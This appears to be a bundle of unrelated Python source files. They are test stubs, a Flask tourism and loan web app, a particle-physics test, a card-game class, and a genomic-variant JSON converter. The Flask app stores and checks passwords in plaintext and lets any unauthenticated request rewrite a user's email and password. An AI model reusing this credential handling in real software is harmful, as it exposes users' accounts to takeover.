@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True, 'use_credentials': True}])
def test_password(sdc_builder, sdc_executor, stage_attributes):
    """Stub: exercise the password option when credentials are in use."""
    pass
@stub
def test_preconditions(sdc_builder, sdc_executor):
    """Stub: exercise the stage's record preconditions option."""
    pass
@stub
def test_required_fields(sdc_builder, sdc_executor):
    """Stub: exercise the stage's required fields option."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': False}, {'resolve_schema_from_db': True}])
def test_resolve_schema_from_db(sdc_builder, sdc_executor, stage_attributes):
    """Stub: cover both settings of 'resolve schema from DB'."""
    pass
@stub
def test_sql_field(sdc_builder, sdc_executor):
    """Stub: exercise the SQL field option."""
    pass
@stub
def test_target_field(sdc_builder, sdc_executor):
    """Stub: exercise the target field option."""
    pass
@stub
def test_timestamp_with_local_timezone_format(sdc_builder, sdc_executor):
    """Stub: exercise the 'timestamp with local timezone' format option."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'unsupported_field_type': 'DISCARD'},
                                              {'unsupported_field_type': 'SEND_TO_PIPELINE'},
                                              {'unsupported_field_type': 'TO_ERROR'}])
def test_unsupported_field_type(sdc_builder, sdc_executor, stage_attributes):
    """Stub: cover each unsupported-field-type policy."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True, 'use_credentials': False},
                                              {'resolve_schema_from_db': True, 'use_credentials': True}])
def test_use_credentials(sdc_builder, sdc_executor, stage_attributes):
    """Stub: cover both settings of 'use credentials'."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True, 'use_credentials': True}])
def test_username(sdc_builder, sdc_executor, stage_attributes):
    """Stub: exercise the username option when credentials are in use."""
    pass
@stub
def test_zoned_datetime_format(sdc_builder, sdc_executor):
    """Stub: exercise the zoned datetime format option."""
    pass
|
#!/usr/bin/python3 Bash
""" RapScore Flask routing file """
from flask import Flask, render_template, request, redirect, jsonify
from models import storage
from models.address import Address
from models.contact_info import Contact_info
from models.investment import Investment
from models.tourist import tourist
from models.loan import Loan
from models.person import Person
from models.request import Request
from models.type_loan import Type_loan
from models.user import User
from models.Guide import Guide
import uuid
# Single Flask application instance used by every route below.
app = Flask(__name__)
# Close session when error connection to database
@app.teardown_appcontext
def close_db(error):
    """
    Remove SQLalchemy session
    Closes an open session
    """
    # Runs after every request (including errored ones) so the scoped
    # session never leaks between requests.
    storage.close()
# Print error when API fails.
@app.errorhandler(400)
def error_db(error):
    """Handle HTTP 400 errors.

    Logs the error to the terminal and returns a JSON error body.
    BUG FIX: the original returned None, which Flask rejects as an
    invalid response and turns into a 500.
    """
    print(error)
    return jsonify({'error': 'Bad request'}), 400
# Home landing web application page
# This home page is where the client lands for the first time
# to read about the project and choose which type of account it wants.
@app.route('/')
@app.route('/home', strict_slashes=False)
def index():
    """Render the landing page with a fresh per-visit identifier."""
    page_token = str(uuid.uuid4())
    return render_template('index.html', id=page_token)
# SIGNIN OPTION
# Login in is an option for already subscribed clients.
@app.route('/signin', strict_slashes=False, methods=['POST'])
def sign_in():
    """Authenticate a user from the login form and route to their profile.

    Reads ``email``/``password`` from the POSTed form, finds the matching
    User, then the Person owning that user, and redirects to the guide or
    tourist profile.  Any failure (bad credentials, missing records, DB
    errors) falls back to /home.
    """
    # BUG FIX: the module-level name `tourist` is shadowed by the
    # /signup/id route function below, so `Tourist`/`tourist` were both
    # broken here.  Re-import the model under a safe alias.
    from models.tourist import tourist as TouristModel
    try:
        form = request.form.to_dict(flat=False)
        email = form['email'][0]
        passd = form['password'][0]
        user = None
        for us in storage.all(User).values():
            if us.email == email and us.psswd == passd:
                user = us
        person = None
        for per in storage.all(Person).values():
            # AttributeError here (user is None) is caught below -> /home.
            if per.user == user.id:
                person = per
        for wor in storage.all(Guide).values():
            # NOTE(review): id_Guide sets this attribute as `wor.Guide`
            # (capitalised); confirm which spelling the Guide model uses.
            if wor.guide == person.id:
                # BUG FIX: the registered route is /profile-Guide/<person_id>,
                # not /profileguide/...
                return redirect('/profile-Guide/{}'.format(person.id), code=302)
        # BUG FIX: `storage.all(Tourist)` raised NameError (import is lowercase).
        for inv in storage.all(TouristModel).values():
            if inv.tourist == person.id:
                return redirect('/profile-tourist/{}'.format(person.id), code=302)
    except Exception as e:
        print(e)
    return redirect('/home')
# TOURISTS' FIRST TWO OPTIONS PAGE
# Tourists can choose from two profiles, PERSON or COMPANY
@app.route('/signup/id', strict_slashes=False)
def tourist():
    """Render the tourist sign-up choice page (person or company)."""
    # NOTE(review): this route function shadows the imported `tourist`
    # model class at module level.
    page_token = str(uuid.uuid4())
    return render_template('s_tourist.html', id=page_token)
# Guide SUBCRIPTION PAGE
# The client (Guide) can create an account from this page
@app.route('/signup/id-Guide', strict_slashes=False, methods=['POST', 'GET'])
def id_Guide():
    """Guide subscription form.

    POST creates a User, a Person linked to it and a Guide record, then
    redirects to the guide profile page; GET renders the empty form.
    """
    if request.method == "POST":
        info = request.form
        obj = User()
        obj.username = info['username']
        obj.email = info['email']
        obj.psswd = info['password']
        obj.status = "active"
        data = Person()
        data.user = obj.id
        data.first_name = info['fname']
        data.last_name = info['lname']
        data.type_id = info['tipo-identificacion']
        data.number_identification = info['numberID']
        data.born_date = info['date']
        wor = Guide()
        # NOTE(review): sign_in reads `wor.guide` (lowercase) but this sets
        # `wor.Guide` -- confirm which attribute the Guide model defines.
        wor.Guide = data.id
        mka = storage
        mka.reload()
        mka.new(obj)
        mka.save()
        mka.new(data)
        mka.save()
        mka.new(wor)
        mka.save()
        mka.close()
        return redirect('/profile-Guide/{}'.format(data.id), code=302)
    return render_template('sign_up_Guide.html', id=str(uuid.uuid4()))
# MAIN Guide PAGE
@app.route('/profile-Guide/<person_id>', strict_slashes=False, methods=['POST', 'GET'])
def profile_Guide(person_id):
    """Guide profile page and edit-profile form handler.

    POST updates (or creates) the person's contact info, address and user
    credentials; GET renders the profile page.
    """
    print("profile Guide", request.method)
    if request.method == "POST":
        print("mijo")
        info = request.form
        # Find this person's existing contact record, or create a fresh one.
        contacts = storage.all(Contact_info)
        number = None
        for contact in contacts.values():
            if contact.person == person_id:
                number = contact
        if number is None:
            number = Contact_info()
            number.person = person_id
        number.type_contact = info['type-contact']
        number.data_contact = info['data-contact']
        # Same pattern for the address record.
        addresses = storage.all(Address)
        add = None
        for adding in addresses.values():
            if adding.person == person_id:
                add = adding
        if add is None:
            add = Address()
        add.address = info['address']
        add.person = person_id
        # Resolve the User owning this Person to update the credentials.
        objects = storage.all(Person)
        obj = None
        for ob in objects.values():
            if ob.id == person_id:
                obj = storage.get(User, ob.user)
        if obj is None:
            obj = User()
        obj.email = info['email']
        obj.psswd = info['password']
        mka = storage
        mka.new(number)
        mka.save()
        mka.new(add)
        mka.save()
        mka.new(obj)
        mka.save()
        mka.close()
        # NOTE(review): obj is a User, but this route expects a Person id --
        # confirm whether redirecting with obj.id is intended.
        return redirect('/profile-Guide/{}'.format(obj.id), code=302)
    print(person_id)
    return render_template('profile_Guide.html', id=str(uuid.uuid4()), person_id=person_id)
# This code gets the information from the database to display in already
# filled fields from the clients profile. When the edit window popups, fields
# should have the information already added to the system. This feature is not
# active.
@app.route('/profile-Guide/<person_id>/info', strict_slashes=False, methods=['GET'])
def get_person_info(person_id):
    """Return contact, address and email info for a person as JSON.

    Used to pre-fill the edit-profile form (feature not active).
    BUG FIX: `number`, `add` and `obj` were referenced before assignment
    whenever no matching record existed, raising UnboundLocalError; they
    are now initialised to None first, matching profile_Guide.
    """
    print("getting user info")
    number = None
    for contact in storage.all(Contact_info).values():
        if contact.person == person_id:
            number = contact
    if number is None:
        number = Contact_info()
    add = None
    for adding in storage.all(Address).values():
        if adding.person == person_id:
            add = adding
    if add is None:
        add = Address()
    obj = None
    for ob in storage.all(Person).values():
        if ob.id == person_id:
            obj = storage.get(User, ob.user)
    if obj is None:
        obj = User()
    resp = {}
    resp['contact'] = number.type_contact
    resp['address'] = add.address
    resp['user'] = obj.email
    print(resp)
    return jsonify(resp), 200
# Apply loan html
# This section is for Guides to request a loan.
@app.route('/apply-loan/<Guide_id>', strict_slashes=False, methods=['POST', 'GET'])
def apply_tourme(Guide_id):
    """
    Display Guides apply-loan html fill out form
    """
    # POST: find (or create) this guide's Guide record and store the
    # requested tour/loan details on it.
    if request.method == "POST":
        info = request.form
        Guides = storage.all(Guide)
        number = None
        for wor in Guides.values():
            # NOTE(review): attribute case (`wor.Guide`) must match how
            # id_Guide stores it; sign_in reads `wor.guide`.
            if wor.Guide == Guide_id:
                number = wor
        if number is None:
            number = Guide()
            number.Guide = Guide_id
        number.request_date = info['date']
        number.type_toure = info['type-toure']
        number.amount_request = info['amount']
        mka = storage
        mka.new(number)
        mka.save()
        mka.close()
        # NOTE(review): the registered route is '/loan-details' with no id
        # parameter, so this redirect will 404 -- confirm intended target.
        return redirect('/loan-details/{}'.format(number.id), code=302)
    return render_template('apply_tourme.html', id=str(uuid.uuid4()), person_id=Guide_id)
# Loan details site
# This sections displays loan details requested. This site is not active
@app.route('/loan-details', strict_slashes=False)
def tourme_details():
    """Render the guide loan-details page (site not active yet)."""
    page_token = str(uuid.uuid4())
    return render_template('tourme_details.html', id=page_token)
# When a client chooses tourist option, here they will be able to
# create a new user by filling the form.
@app.route('/users/id-person', strict_slashes=False, methods=['POST', 'GET'])
def tourist_person():
    """Display/process the natural-person tourist sign-up form.

    POST creates the User, Person and tourist records and redirects to
    the tourist profile page; GET renders the empty form.
    """
    # The model class `tourist` is shadowed by the /signup/id route
    # function of the same name, so re-import it under an alias.
    from models.tourist import tourist as TouristModel
    if request.method == "POST":
        info = request.form
        obj = User()
        obj.username = info['username']
        obj.email = info['email']
        obj.psswd = info['password']
        obj.status = "active"
        data = Person()
        data.user = obj.id
        data.first_name = info['fname']
        data.last_name = info['lname']
        data.type_id = info['type-identificacion']
        data.number_identification = info['numberID']
        data.born_date = info['date']
        inv = TouristModel()  # BUG FIX: was `turist()`, an undefined name
        inv.tourist = data.id  # BUG FIX: attribute was misspelled `turist`
        mka = storage
        mka.reload()
        mka.new(obj)
        mka.save()
        mka.new(data)
        mka.save()
        mka.new(inv)
        mka.save()
        mka.close()
        # BUG FIX: redirect to the registered route, not a template path
        # ('/profile_Tourist.html/...' matched nothing).
        # NOTE(review): sign_in redirects with the Person id; this passes
        # the User id -- confirm which one the profile route expects.
        return redirect('/profile-tourist/{}'.format(obj.id), code=302)
    return render_template('signup_naturalperson.html', id=str(uuid.uuid4()))
# tourists subscription form
# Companies will be able to create their profile as tourists
@app.route('/users/id-company', strict_slashes=False, methods=['POST', 'GET'])
def tourist_company():
    """Display/process the company tourist sign-up form.

    POST creates the User, Person and tourist records and redirects to
    the tourist profile page; GET renders the empty form.
    """
    # BUG FIX: the bare name `tourist` resolves to the /signup/id route
    # function (which shadows the model import), so `tourist()` never
    # produced a model instance.  Re-import the model under an alias.
    from models.tourist import tourist as TouristModel
    if request.method == "POST":
        info = request.form
        print("hola, cómo estás?")
        print(info)
        obj = User()
        obj.username = info['username']
        print(obj.username)
        obj.email = info['email']
        obj.psswd = info['password']
        obj.status = "active"
        data = Person()
        data.user = obj.id
        data.name_company = info['ncompany']
        data.business_name = info['bname']
        data.tradename = info['tname']
        data.legal_status = info['lstatus']
        data.legal_repre_full_name = info['lrepre_name']
        data.legal_repre_type_id = info['tipo-identificacion']
        data.legal_repre_number_id = info['lrepre_id']
        data.born_date = info['date']
        inv = TouristModel()
        inv.tourist = data.id
        mka = storage
        mka.reload()
        mka.new(obj)
        mka.save()
        mka.new(data)
        mka.save()
        mka.new(inv)
        mka.save()
        mka.close()
        # NOTE(review): sign_in redirects with the Person id; this passes
        # the User id -- confirm which one the profile route expects.
        return redirect('/profile-tourist/{}'.format(obj.id), code=302)
    return render_template('signup_company.html', id=str(uuid.uuid4()))
# Main tourists profile page
@app.route('/profile-tourist/<tourist_id>', strict_slashes=False)
def profile_tourist(tourist_id):
    """Render the tourist profile page (status, investments, edit, bank)."""
    # tourist_id is accepted for the URL shape but not used by the template yet.
    page_token = str(uuid.uuid4())
    return render_template('profile_tourist.html', id=page_token)
# tourists edit profile form
@app.route('/edit-profile', strict_slashes=False)
def edit_profile():
    """Render the tourist edit-profile form."""
    page_token = str(uuid.uuid4())
    return render_template('edit_profile.html', id=page_token)
# tourists investment form
@app.route('/investment', strict_slashes=False)
def investment():
    """Render the tourist investment form."""
    page_token = str(uuid.uuid4())
    return render_template('investment.html', id=page_token)
# tourists add bank details form when adding new bank accounts
@app.route('/bank-details', strict_slashes=False)
def bank_details():
    """Render the add-bank-details form for new bank accounts."""
    page_token = str(uuid.uuid4())
    return render_template('bank_details.html', id=page_token)
# Test Deployment Strategy for adding new features or trying out new ones.
@app.route('/tests', strict_slashes=False)
def tests():
    """Render the tests page.

    Sandbox page used to try out new features before wiring them into the
    main site (deployment strategy).
    """
    page_token = str(uuid.uuid4())
    return render_template('tests.html', id=page_token)
if __name__ == "__main__":
    """ Main Function redirecting to host 0.0.0.0 and port 5000 """
    # Bind to all interfaces so the app is reachable from outside localhost.
    app.run(host='0.0.0.0', port=5000)
|
__author__ = 'swebb'
"""
This is a test to determine whether the two-body Coulomb attraction between
an electron and a positron is correct.
"""
from opal.fields import discrete_fourier_electrostatic as dfe
from opal.interpolaters_depositers import tent_dfes as depinterp
from opal.particles import non_rel_ptcl as ptcls
from opal.boundaries import particle_boundaries
from matplotlib import pyplot as plt
import matplotlib as mpl
#mpl.rc('font',**{'family':'sans-serif','sans-serif':[
#    'Helvetica']})
# Render all figure text with a LaTeX serif (Palatino) font.
mpl.rc('font',**{'family':'serif','serif':['Palatino'], 'size':16})
mpl.rc('text', usetex=True)
__author__ = 'swebb'
__email__ = '<EMAIL>'
from opal.auxiliary import constants
import numpy as np
# Set all simulation parameters at the top for convenience
# NOTE(review): this script uses Python 2 syntax (a ``print`` statement near
# the end), so these comments assume a Python 2 runtime.
dimensions = 2
# Time step -- presumably in seconds; units not stated here, TODO confirm.
dt = 1.e-10
# nsteps is temporarily 1 for debugging; the commented value is the full run.
nsteps = 1#2*10**4
plot_potential = True
plot_diagnostics = False
# Particle properties
num_particles = 2
macro_weight = 1
# Integer division under Python 2 -- fine while both operands are ints.
num_macro = num_particles/macro_weight
# Rectangular domain extent along each dimension.
simulation_lengths = np.array([30., 30.])
# Define the periodic boundary conditions
class periodic_boundary:
    """Periodic (wrap-around) boundary conditions on a rectangular domain."""

    def __init__(self, lengths):
        """lengths: domain extent along each dimension."""
        self.lengths = np.array(lengths)

    def apply_boundary(self, particles):
        """Wrap every particle position back into [0, length) per dimension."""
        wrapped = particles.pos[:] % self.lengths
        particles.pos[:] = wrapped
my_boundary = periodic_boundary(simulation_lengths)
# Field properties
n_modes = 250
delta_k = 2*np.pi/simulation_lengths
macro_size = 0.15
# The params_dictionary for the electrostatic field + particles
sim_parameters = {}
sim_parameters['number of particles'] = num_particles
sim_parameters['charge'] = -constants.elementary_charge
sim_parameters['mass'] = constants.electron_mass
sim_parameters['dimensions'] = dimensions
sim_parameters['dt'] = dt
# Number of particles per macroparticle
sim_parameters['macro weight'] = macro_weight
# NOTE(review): three size components are supplied although dimensions == 2;
# presumably the extra entry is ignored by the solver -- TODO confirm.
sim_parameters['particle size'] = np.array([macro_size, macro_size, macro_size])
# Field parameters
sim_parameters['n_modes'] = [n_modes]*dimensions
sim_parameters['delta k'] = delta_k
# Create the depositer/interpolater, particles, and field solvers
the_depinterp = depinterp.tent_dfes(sim_parameters)
the_particles = ptcls.non_rel_ptcl(sim_parameters)
the_fields = dfe.discrete_fourier_electrostatic(sim_parameters)
the_boundary = particle_boundaries.particle_boundaries(sim_parameters)
the_boundary.add_boundary(my_boundary)
the_depinterp.add_field(the_fields)
# Place two particles 1.0 apart, slightly off-center, starting at rest.
# The second particle's weight of -1 presumably models the opposite charge
# (the positron) -- TODO confirm against non_rel_ptcl.add_particle.
# (Removed a dead ``weight = []`` assignment that was immediately overwritten.)
pos = [0.5*(simulation_lengths[0]-1.), 0.5*simulation_lengths[1]+0.1]
vel = [0., 0.]
weight = 1.
the_particles.add_particle(pos, vel, weight)
pos = [0.5*(simulation_lengths[0]+1.), 0.5*simulation_lengths[1]+0.1]
vel = [0., 0.]
weight = -1.
the_particles.add_particle(pos, vel, weight)
# Run the simulation: deposit charge, then compute the resulting forces.
the_particles.half_move_back()
for idx in range(0, nsteps):
    the_particles.move()
    the_depinterp.deposit_sources(the_particles.pos,
                                  the_particles.vel,
                                  the_particles.weights)
    acceleration = the_depinterp.compute_forces(the_particles.pos,
                                                the_particles.vel,
                                                the_particles.weights)
# Reference accelerations for the two particles (regression values).
the_answer = np.array([[ 6.29176115e+07, -3.91382417e-07],
                       [ -6.29176115e+07, -3.32348075e-07]])
error = the_answer-acceleration
#right_value =
#error_metric
# print() keeps output identical on Python 2 and also runs on Python 3
# (was the Python 2 statement ``print acceleration``).
print(acceleration)
# Suit -> color mapping; the "left bower" rules below depend on suit color.
COLORCODE = {'Spades': 'black', 'Clubs': 'black', 'Diamonds': 'red', 'Hearts': 'red'}


class Card:
    """
    Represents an individual card in the deck. Also controls the value of the
    cards. Comparison operators (<, >, <=, >=) compare the current round value.
    """

    def __init__(self, facevalue, suit, basevalue, learner=False):
        """
        :param facevalue: string face of the card, e.g. 'J', 'A', '10'
        :param suit: string suit name, e.g. 'Spades'
        :param basevalue: int value of the card before any trump/lead bonuses
        :param learner: bool, when True __repr__ also shows the round value
        """
        self.facevalue = facevalue
        self.suit = suit
        self.basevalue = basevalue
        self.roundvalue = basevalue  # value for the current round/trick
        self.color = self.get_color()
        self.learner = learner

    def get_value(self):
        """
        Getter method which provides the value of the card
        :return: int current value of the card
        """
        return self.roundvalue

    def set_value(self, trumpsuit=None, leadsuit=None, resetval=False, evaltrumpsuit=False, basevaluereset=False):
        """
        Sets the value of the card depending on the trumpsuit, suit of card, phase of the game, etc.
        :param trumpsuit: string i.e 'Spades'
        :param leadsuit: string representing the first card played in a trick
        :param resetval: bool 'soft' reset which doesn't change value of trumpsuited cards
        :param evaltrumpsuit: bool forces change of value of trumpsuited cards
        :param basevaluereset: bool 'hard' reset which restores all cards back to basevalue
        :return: None
        """
        if basevaluereset:
            self.roundvalue = self.basevalue
        # Soft reset: everything except trump cards and the two bowers.
        if resetval and self.suit != trumpsuit and not self._is_color_jack(trumpsuit):
            self.roundvalue = self.basevalue
        if evaltrumpsuit:
            self._apply_trump_bonus(trumpsuit)
        # Following the lead suit (when it is not trump) is worth +7, except
        # for the left bower, which counts as a trump card instead.
        if leadsuit and trumpsuit != leadsuit and leadsuit == self.suit \
                and not self._is_color_jack(trumpsuit):
            self.roundvalue += 7

    def _is_color_jack(self, trumpsuit):
        """True for either bower: a Jack whose color matches the trump suit."""
        return self.facevalue == 'J' and self.color == COLORCODE[trumpsuit]

    def _apply_trump_bonus(self, trumpsuit):
        """Boost trump-related cards: +14 for the trump suit, +5 more for the
        right bower (Jack of trump), +18 for the left bower (Jack of the
        same-color suit).

        BUGFIX: the left-bower branch used to be an ``elif`` nested inside the
        ``suit == trumpsuit`` block, making it unreachable (the left bower is
        by definition NOT of the trump suit); it is now the alternative branch.
        """
        if self.suit == trumpsuit:
            self.roundvalue += 14
            # Right Bower
            if self.facevalue == 'J':
                self.roundvalue += 5
        # Left Bower
        elif self.facevalue == 'J' and self.color == COLORCODE.get(trumpsuit):
            self.roundvalue += 18

    def get_color(self):
        """
        Getter method for color
        :return: string i.e 'black'
        """
        return COLORCODE[self.suit]

    def get_suit(self):
        """
        Getter method for card suit
        :return: string i.e. 'Spades'
        """
        return self.suit

    def __repr__(self):
        if self.learner:
            return str((self.facevalue, self.suit, self.roundvalue))
        else:
            return str((self.facevalue, self.suit))

    def __gt__(self, othercard):
        return self.roundvalue > othercard.roundvalue

    def __lt__(self, othercard):
        return self.roundvalue < othercard.roundvalue

    def __ge__(self, othercard):
        return self.roundvalue >= othercard.roundvalue

    def __le__(self, othercard):
        return self.roundvalue <= othercard.roundvalue
|
#written by <NAME>
#What does this script do, you may ask.
#Good question!
#Its purpose is to take raw STMP data from the stmp TSV and properly format it for drawing by the STMP visualization program itself.
#This involves reading through the tsv, selecting values of interest, and converting them into proper "drawing vals" for the visualization.
#All that is done in here, in python.
#Python is so much easier than java, and I designed this so java does the bare minimum except drawing.e
import sys
import os
import random
import json
import drawing_functions
import pandas as pd
#we add the xls_utils file I have created to the path
#ALERT! this will have to change
xls_utils_path = '/Users/noahfriedman/Desktop/igvProject/xls_utils'
sys.path.append(xls_utils_path)
import xls_parsing_functions
#ALERT: maybe an api implements this better but basically I just want to have a variable 'X = 1 | 2' so I wrote this code
#a dictionary mapping an inuitive name (ie chromosome) to all the valid values it could have
#there are three column dicts, one for each class of variable: 'infoFields' 'numericAnnotations', 'stringAnnotations'
#The purpose of the data structures is twofold: to enumerate where different fields go, and establish mappings to deal with ambiguously named columns
#ALERT: maybe in the future this should be determined by a input parameter
# Each dict maps an intuitive field name to the tuple of column headers that
# may carry it in the input spreadsheet.
infoColumnCorrespondenceDict = {
    'chromosome': ('CHROM', 'Chromosome'),
    'ref': ('REF', 'Reference Allele', 'Reference Nucleotide'),
    'alt': ('ALT', 'Sample Allele', 'Variant Nucleotide'),
    'pos': ('POS', 'Position', 'Start')
}
numericColumnCorrespondenceDict = {
    'fullExac': ('hg19_popfreq_all_20150413_exac_all', 'ExAC (AF%)', 'ExAC (%)', 'ExAC'),
    #ALERT: please confirm this is the correct interpretation
    'europeExac': ('ExAC European', 'hg19_popfreq_all_20150413_exac_nfe'),
    '1kgenomes': ('1000 Genomes', 'hg19_popfreq_all_20150413_1000g_all')
}
stringColumnCorrespondenceDict = {
    # BUGFIX: '(x)' without a trailing comma is just a parenthesized string,
    # not a 1-tuple -- iterating it yields single characters. The trailing
    # comma makes it match the tuple shape of the sibling dicts above.
    'clinvar': ('clinvar_clinical_significance',)
}
#defaultNumericDrawingCols = ['QUAL','Max_Allele_Freq_Summary','hg19_phastConsElements46way_r_MSA_MCE_lod','hg19_ljb26_all_CADD_raw','AD','hg19_ljb26_all_Polyphen2_HDIV_score','exac_tolerance_r_lof_z','DP']
#defaultStringDrawingCols = ['clinvar_clinical_significance','Function_Summary','ExonicFunction_Summary']
#----------------------------------------------------------------
#reads out necessary fields from the annotation tsv file
#DEPRECATED! Here only in case we want to allow the user to provide a TSV as the input file
def read_tsv(tsv):
    """Read an annotation TSV and return (columns, data).

    :param tsv: path to the tab-separated file; first line is the header
    :return: (list of column names, list of row value-lists)
    """
    data = []
    # context manager closes the handle as soon as the lines are in memory
    with open(tsv) as f:
        lines = f.readlines()
    # just to be safe we strip out all returns (carriage returns and newlines)
    columns = lines[0].strip('\n').strip('\r').split('\t')
    # print() call keeps the module Python 2/3 compatible (was ``print columns``)
    print(columns)
    # NOTE: only the first 99 data rows are read -- a debugging limit kept
    # from the original (switch to lines[1:] to read everything).
    #for line in lines[1:]:
    for line in lines[1:100]:
        data.append(line.strip('\n').strip('\r').split('\t'))
    return columns, data
# Copies the basic variant fields (ref/alt etc.) into the variant record.
def get_variant_info(variantLine, idx_dict, variantRecord):
    """Write the core info fields of one variant line into variantRecord.

    NOTE(review): relies on a module-level ``infoCols`` iterable that is not
    defined in this file -- presumably supplied elsewhere; TODO confirm.
    """
    #CHANGE the structure of this
    for column in infoCols:
        value = variantLine[idx_dict[column]]
        # never store the empty string: it breaks downstream interpretation
        if value == '':
            value = 'na'
        if column == 'Gene_Summary':
            # placeholder: substitute a random gene name (original behavior)
            value = random.choice(['OR2T35', "BRCA1", "AFF3", "MYO7B", "ZNF806", "NEB", "SP100", "SYN2"])
        variantRecord['coreStmpFields']['infoFields'][column] = value
#writes output to a file that can then be read by the graphical interface
#each variant gets its own file
def write_file(columns, linesToWrite, pos, savePath="/home/noahfrie/noahfrie/devCode/stmpViz/outputFiles"):
    """Write one variant's drawing lines to <savePath>/<pos>viz.txt.

    :param columns: unused; kept for interface compatibility with callers
    :param linesToWrite: list of strings, written one per line
    :param pos: variant position, used to build the file name
    :param savePath: output directory (new keyword parameter; defaults to the
        previously hard-coded path, so existing callers are unaffected)
    """
    fullName = os.path.join(savePath, pos + 'viz.txt')
    # ``with`` guarantees the file is closed -- the original called
    # ``f.close`` without parentheses, so the handle was never closed.
    with open(fullName, 'w') as f:
        for line in linesToWrite:
            f.write(line)
            f.write('\n')
#initializes the json dictionary structure used to store data values
#the structure is:
#for each variant:
#{
# coreStmpFields: {
# infoFields: {}
# numericAnnotations: {}
# stringAnnotations: {}
# }
# metainfo?
#}
#the templates for what these parts of the json should look like
# WARNING: these are shared module-level dicts. Consumers must copy them
# (e.g. ``copy.deepcopy(template)``) before mutating; assigning them directly
# makes every field alias the same object.
infoFieldTemplate = {'value': '', 'includeInDrawing': False}
numericAnnotationTemplate = {'value': '', 'drawingValue': '', 'includeInDrawing': False, 'associatedValues': []}
stringAnnotationTemplate = {'value': '', 'drawingValue': '', 'includeInDrawing': False, 'associatedValues': []}
otherFieldTemplate = {'value': '', 'drawingValue': '', 'includeInDrawing': False, 'associatedValues': []}
#converts a row of the data frame to a json file for the visualization
def convert_df_row_to_json(row, curDf):
    """Convert one DataFrame row (a variant) into the JSON structure used by
    the visualization.

    Each spreadsheet column is routed to one of four buckets (info, numeric,
    string, other) by looking its name up in the correspondence dicts.
    """
    import copy  # local import: used only for deep-copying the templates
    variant = {}
    coreAnnotationFields = {'infoFields': '', 'numericAnnotations': '', 'stringAnnotations': '', 'otherFields': ''}
    variant['coreAnnotationFields'] = coreAnnotationFields
    infoFields = {}
    numericAnnotations = {}
    stringAnnotations = {}
    otherFields = {}
    for col in curDf.columns:
        # BUGFIX: the original did ``skeleton = infoFieldTemplate`` which
        # merely aliases the shared module-level template dict -- every field
        # then pointed at the SAME dict and all values collapsed to the last
        # one written (and the templates themselves were mutated). Deep-copy
        # so each field gets its own structure (deep, because the templates
        # contain a mutable 'associatedValues' list).
        # Also: each lookup is now performed once instead of twice per branch.
        valName = xls_parsing_functions.find_official_column_name(infoColumnCorrespondenceDict, col, curDf)
        if valName is not None:
            entry = copy.deepcopy(infoFieldTemplate)
            entry['value'] = row[col]
            infoFields[valName] = entry
            continue
        valName = xls_parsing_functions.find_official_column_name(numericColumnCorrespondenceDict, col, curDf)
        if valName is not None:
            entry = copy.deepcopy(numericAnnotationTemplate)
            entry['value'] = row[col]
            numericAnnotations[valName] = entry
            continue
        valName = xls_parsing_functions.find_official_column_name(stringColumnCorrespondenceDict, col, curDf)
        if valName is not None:
            entry = copy.deepcopy(stringAnnotationTemplate)
            entry['value'] = row[col]
            stringAnnotations[valName] = entry
            continue
        # no mapping found: keep the raw column name
        entry = copy.deepcopy(otherFieldTemplate)
        entry['value'] = row[col]
        otherFields[col] = entry
    variant['coreAnnotationFields']['infoFields'] = infoFields
    variant['coreAnnotationFields']['numericAnnotations'] = numericAnnotations
    variant['coreAnnotationFields']['stringAnnotations'] = stringAnnotations
    variant['coreAnnotationFields']['otherFields'] = otherFields
    return variant
# Builds the metadata component of the variant structure.
def init_variant_metadata_structure(variant, sheetName):
    """Return the metadata sub-dictionary for one variant.

    ``variant`` is currently unused; kept for interface compatibility.
    """
    metadata = {
        'metrics': {'numTimesClicked': ''},
        'workflow': {
            'curationMode': sheetName,
            'freeTextNotes': 'enter any notes here',
        },
    }
    return metadata
#testing function that pretty prints the json structure
def json_pretty_print_struct(jsonFile):
    """Pretty-print a JSON string to stdout (debug helper).

    :param jsonFile: a JSON-encoded string
    """
    parsed = json.loads(jsonFile)
    # print() call keeps the module Python 2/3 compatible
    # (was the Python 2 statement ``print json.dumps(...)``)
    print(json.dumps(parsed, indent=4, sort_keys=True))
def write_json_file(filename, parsedJson):
    """Serialize ``parsedJson`` to ``filename`` as JSON.

    Uses ``with`` so the file is flushed and closed -- the original opened
    the file and never closed it, risking truncated output.
    """
    with open(filename, 'w+') as jsonFile:
        jsonFile.write(json.dumps(parsedJson))
#--------------------MAIN CODE-------------------------------
#test code for sorting data by specified value
# Usage: python <script> <input.xls>
# NOTE(review): Python 2 syntax (print statement below).
inputXls = sys.argv[1]
sheetDict = xls_parsing_functions.read_xls_sheets(inputXls)
xls = pd.ExcelFile(inputXls)
sheetNames = xls.sheet_names
jsonData = []
# Build one JSON record per row (variant) across every sheet of the workbook.
for sheetName in sheetNames:
    for index, row in sheetDict[sheetName].iterrows():
        curVariant = convert_df_row_to_json(row, sheetDict[sheetName])
        #set the metadata
        curVariant['metadata'] = init_variant_metadata_structure(curVariant, sheetName)
        jsonData.append(curVariant)
#alert adjust the path based on the environment in which we are doing this
jsonFilename = 'visualization.json'
#jsonFilename = inputXls.strip('.xls') + '_visualization.json'
print 'writing json data to ', jsonFilename
write_json_file(jsonFilename, jsonData)
#json_pretty_print_struct(json.dumps(jsonData))
|
<filename>src/ksc/macos.py
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
